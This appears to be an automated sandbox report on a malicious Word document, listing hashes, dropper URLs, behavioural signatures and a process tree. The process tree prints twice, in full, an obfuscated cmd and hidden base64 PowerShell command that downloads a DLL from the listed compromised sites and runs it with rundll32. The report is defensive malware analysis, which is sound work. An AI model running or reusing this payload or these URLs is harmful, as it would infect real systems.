1be61e9a502a880e31d7732ee6c82c0aaf3bd5ae7e30654f42755e51bda9d2ba

General

Target

besked_2821599 364436.doc
Size

158KB
MD5

d5000b230a8233a3a2accf351349dc61
SHA1

ab2281d43fd61122ef577b24f33b3376823f76f2
SHA256

1be61e9a502a880e31d7732ee6c82c0aaf3bd5ae7e30654f42755e51bda9d2ba
SHA512

f7d76f41a0c2f224e24841f2145e1542846b9d709d4bdc3ed1dfeeded9f734c116d55f2d09665ecb8c12d96dfedf77f8e44a849e4768e1b1b53ae41e68517371

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://fynart.com/wp-admin/aNuMy/

exe.dropper

http://dermedicoclinic.com/js/NElI8ZC/

exe.dropper

http://geolifesciences.com/font/r/

exe.dropper

http://rollinghood.com/how-to-ifwed/buj6VQx/

exe.dropper

http://jardindhelena.com/wp-content/u20/

exe.dropper

http://kingshowworldshoppingmall.com/cgi-bin/Ga/

exe.dropper

http://davinciworldshoppingmall.com/cgi-bin/Eh/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1244 1840 cmd.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

6 732 powershell.exe
8 1604 rundll32.exe
Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

288 rundll32.exe
288 rundll32.exe
288 rundll32.exe
288 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1244	1840	cmd.exe

flow	pid	process
6	732	powershell.exe
8	1604	rundll32.exe

pid	process
288	rundll32.exe
288	rundll32.exe
288	rundll32.exe
288	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Otjwmzgmqof\zmwwcjubrf.vrg	rundll32.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

596 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exerundll32.exe

pid process

732 powershell.exe
732 powershell.exe
1604 rundll32.exe
1604 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 732 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

596 WINWORD.EXE
596 WINWORD.EXE

pid	process
596	WINWORD.EXE

pid	process
732	powershell.exe
732	powershell.exe
1604	rundll32.exe
1604	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	732	powershell.exe

pid	process
596	WINWORD.EXE
596	WINWORD.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1244 wrote to memory of 1548	1244	cmd.exe	msg.exe
PID 1244 wrote to memory of 1548	1244	cmd.exe	msg.exe
PID 1244 wrote to memory of 1548	1244	cmd.exe	msg.exe
PID 1244 wrote to memory of 732	1244	cmd.exe	powershell.exe
PID 1244 wrote to memory of 732	1244	cmd.exe	powershell.exe
PID 1244 wrote to memory of 732	1244	cmd.exe	powershell.exe
PID 732 wrote to memory of 1852	732	powershell.exe	rundll32.exe
PID 732 wrote to memory of 1852	732	powershell.exe	rundll32.exe
PID 732 wrote to memory of 1852	732	powershell.exe	rundll32.exe
PID 1852 wrote to memory of 288	1852	rundll32.exe	rundll32.exe
PID 1852 wrote to memory of 288	1852	rundll32.exe	rundll32.exe
PID 1852 wrote to memory of 288	1852	rundll32.exe	rundll32.exe
PID 1852 wrote to memory of 288	1852	rundll32.exe	rundll32.exe
PID 1852 wrote to memory of 288	1852	rundll32.exe	rundll32.exe
PID 1852 wrote to memory of 288	1852	rundll32.exe	rundll32.exe
PID 1852 wrote to memory of 288	1852	rundll32.exe	rundll32.exe
PID 288 wrote to memory of 1604	288	rundll32.exe	rundll32.exe
PID 288 wrote to memory of 1604	288	rundll32.exe	rundll32.exe
PID 288 wrote to memory of 1604	288	rundll32.exe	rundll32.exe
PID 288 wrote to memory of 1604	288	rundll32.exe	rundll32.exe
PID 288 wrote to memory of 1604	288	rundll32.exe	rundll32.exe
PID 288 wrote to memory of 1604	288	rundll32.exe	rundll32.exe
PID 288 wrote to memory of 1604	288	rundll32.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\besked_2821599 364436.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:596

C:\Windows\system32\cmd.exe
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1244

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:1548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -enc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll ShowDialogA
3⤵
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll ShowDialogA
4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:288

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Otjwmzgmqof\zmwwcjubrf.vrg",ShowDialogA
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

MD5
2b26b868102f32d8726a3df440fa91d1

SHA1
f86316e3c6358f21dc092a61165d5fe3a7370f1b

SHA256
bd80c6b05957aefc390bb2e8fd2ce13042e4bd8d8a8f622c523e48d111c5dd49

SHA512
f61c0507b88b497099ee1636087494ac617d74573ad2fe12b1da154c6cc8c1315144e9810ddd2389f5f7ece708dbc6feb3045e31d6a427d011af43bde613dcf9

Download Submit
\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

MD5
2b26b868102f32d8726a3df440fa91d1

SHA1
f86316e3c6358f21dc092a61165d5fe3a7370f1b

SHA256
bd80c6b05957aefc390bb2e8fd2ce13042e4bd8d8a8f622c523e48d111c5dd49

SHA512
f61c0507b88b497099ee1636087494ac617d74573ad2fe12b1da154c6cc8c1315144e9810ddd2389f5f7ece708dbc6feb3045e31d6a427d011af43bde613dcf9

Download Submit
\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

MD5
2b26b868102f32d8726a3df440fa91d1

SHA1
f86316e3c6358f21dc092a61165d5fe3a7370f1b

SHA256
bd80c6b05957aefc390bb2e8fd2ce13042e4bd8d8a8f622c523e48d111c5dd49

SHA512
f61c0507b88b497099ee1636087494ac617d74573ad2fe12b1da154c6cc8c1315144e9810ddd2389f5f7ece708dbc6feb3045e31d6a427d011af43bde613dcf9

Download Submit
\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

MD5
